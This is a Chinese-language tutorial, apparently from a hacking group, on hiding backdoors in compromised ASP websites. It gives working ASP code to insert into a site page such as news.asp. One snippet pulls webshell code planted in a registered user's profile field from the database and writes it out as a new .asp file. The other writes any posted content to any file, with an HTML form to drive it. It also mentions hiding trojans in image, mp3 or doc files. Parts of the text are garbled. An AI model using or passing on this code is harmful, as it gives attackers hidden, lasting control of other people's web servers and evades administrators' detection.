前言:好長時間了��,從剛開始的站點管理器到現在流行的幾款asp后門����,相信大多網管都能說出這些經典webshell的名字,如海洋���、老兵��、藍屏等,也相信大多數的網管學會了關鍵字的搜索方法來搜索這些木馬���,當然現在的時間如果再象隱藏后門就要講些技巧啦��,俗話說的好“佛高一尺,我高一丈”。
我不否認n早前的那個把asp木馬寫到圖片文件中不失為一種好的方法����,其實不僅可以寫到圖片啦寫到mp3文件里寫到doc文件里都是可以的啦����。
copy 文件名/參數 + 文件名/參數 生成文件名
這樣的方法可以很靈活的運用來達到隱藏文件的目的����,具體的參數就是/a以acsic碼方式,/b二進制方式���,就不羅嗦這些了,至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍��。今天要講的是如何把后門放到后綴.mdb的數據庫中�����,前提是在我們拿到一個webshell之后……
我們所知道的�,很多站點在用戶注冊的時候要讓填好多東西例如:用戶名�、密碼、QQ����、郵箱�、個人簡介�、電話�、聯系方式����、住址一類的����。而對應到數據庫中也都會有相應的表、字段、值�。我今天要做的就是�����,我注冊一個用戶在我的個人簡介的地方上寫入shell代碼,然后修改他站點上的一個文件,使用的時候觸發這個文件����,就把我個人簡歷中的shell代碼����,備份到當前目錄下�。
廢話少說了,大家看代碼:
<%
if request("action")="Firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.createObject("Scrset txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>
將上邊的代碼加到站點的一個文件中�����,如news.asp�����。根據我們了解的信息�����,在其站點注冊后,下載數據庫看結構。我注冊的firefox名字是在 user表�����,其id值為119 用于存放我注冊簡歷的表字段為jl���。
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
那么在使用的時候我們就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell���。以上可以說是萬千隱藏方法中的一種�����,下邊再說另外一種更方便的隱藏方法,這個方法就和mdb后綴無關系了�。
同樣我們還是修改news.asp���,將以下代碼插入到對方news.asp中:
<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>
這段代碼相對簡單些��,算是一個木馬的服務端吧。使用的時候以這段代碼配合:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>F.s.t火狐技術聯盟[www.wrsky.com]</title>
<FORM action="http://localhost/config.asp?action ... method=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c rows=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
將以上代碼中的:“http://localhost/config.asp?action=firefox”替換成你的服務端地址�,然后保存為本地的.htm文件��。本地打開后定義要生成的文件名、文件內容���、遠程提交, ok�����,又是一種留后門的方法�。
